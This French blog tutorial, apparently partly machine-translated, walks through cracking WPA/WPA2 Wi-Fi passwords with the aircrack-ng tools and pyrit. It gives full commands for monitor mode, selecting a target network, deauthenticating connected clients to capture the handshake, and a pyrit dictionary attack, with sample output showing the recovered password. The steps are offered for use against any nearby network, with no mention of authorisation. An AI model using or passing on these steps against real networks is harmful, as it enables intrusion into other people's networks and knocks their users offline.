Bruteforce WPA / WPA2

Bruteforce WPA / WPA2 
Securité 

Comment Bruteforce WPA / WPA2 Tutoriel avec Backtrack et Pyrit

1. Nous devons d'abord maitre notre carte réseau en mode monitor :
airmon-ng start wlan0
2. Exécutez ensuite airodump-ng pour voir tous les réseaux sans fil disponibles :
airodump-ng mon0
3. Maintenant, nous choisissons notre cible et copions tous les détails (ESSID, BSSID et Channel). Lorsque vous avez ces données, fermez airodump et exécutez-le de nouveau avec la cible:
airodump-ng --bssid (BSSID HERE) -c (CHANNEL NUMBER) -w (ESSID HERE)
4. Maintenant, vous pouvez attendre le Handshake ou en faire une dépendante si quelqu'un est connecté au réseau. Si quelqu'un est connecté, utilisez deauthentication:
aireplay-ng -0 10 -a (BSSID HERE) -c (MAC ADDRES OF THE PC CONNECTED)
5. Une fois que vous avez obtenu le Handshake, fermez l'airodump, ouvrez un nouveau terminal et testez le Handshake avec pyrit:
pyrit -r (HANDSHAKE NAME HERE).cap analyze
Maintenant, vous devriez voir quelque chose comme ceci, indiquant un Handshake a été trouvé sur le fichier que vous avez analysé:
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'wpapsk-linksys.dump.gz' (1/1)...
587 packets (587 802.11-packets), 1 APs
#1: AccessPoint 00:0b:86:c2:a4:85 ('linksys')
  #0: Station 00:13:ce:55:98:ef, handshake found
  #1: Station 01:00:5e:7f:ff:fa
  #2: Station 01:00:5e:00:00:16

6. Super ! Maintenant vous pouvez procéder à révéler le mot de passe. Avant d'aller plus loin, vous devriez savoir pyrit a une caractéristique importante. L'une de ces fonctionnalités est que vous pouvez importer plusieurs dictionnaires dans la base de données. Cela signifie que vous pouvez créer une liste de mots de passe très grand pour toutes les handshakes que vous avez ! Faisons-le ! Écrire :
pyrit eval
7. Cela vous montrera combien de mots de passe sont dans la base de données. Comme vous pouvez le constater, il n'existe actuellement aucun mot de passe. Importez-les dans la base de données:
pyrit -i (DICTIONARY NAME).(FORMAT HERE) import_passwords
Rappelez-vous que le format peut varier, certains dictionnaires sont par exemple au format .txt. Écrivez le nom et le format correctement !
Maintenant, Pyrit devrait travailler sur la base de données:
Connecting to storage at 'file://'...  connected.
10202 lines read. Flushing buffers...
All done.
8. Maintenant nous devons créer un ESSID. Pyrits a besoin d'un nom pour le réseau que vous attaquez, il suffit d'écrire le Essid du réseau que vous attaquez:
pyrit -e linksys create_essid
Exécutez "pyrit eval" pour voir l'état. Le nombre de mots de passe apparaît et le nom de l'ESSID. Parfait !
9. Maintenant, nous devons traiter par lots la base de données. Cela vous permettra d'économiser du temps et d'augmenter la vitesse de craquage du mot de passe..
pyrit batch
Attaquer le Handshake avec la base de données Pyrit
pyrit -r (handshakename).cap attack_db

Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
Parsing file 'wpapsk-linksys.dump.gz' (1/1)...
587 packets (587 802.11-packets), 1 APs

Picked AccessPoint 00:0b:86:c2:a4:85 ('linksys') automatically.
Attacking handshake with Station 00:13:ce:55:98:ef...
Tried 1639 PMKs so far (39.8%); 1577435 PMKs per second.

The password is 'dictionary'.
J'espère que ce didacticiel a été utile! Si vous avez des questions, des suggestions ou des commentaires, n'hésitez pas à commenter ci-dessous!
Merci et amusez-vous!
                                                                                                              N.Doudah

Enregistrer un commentaire

0 Commentaires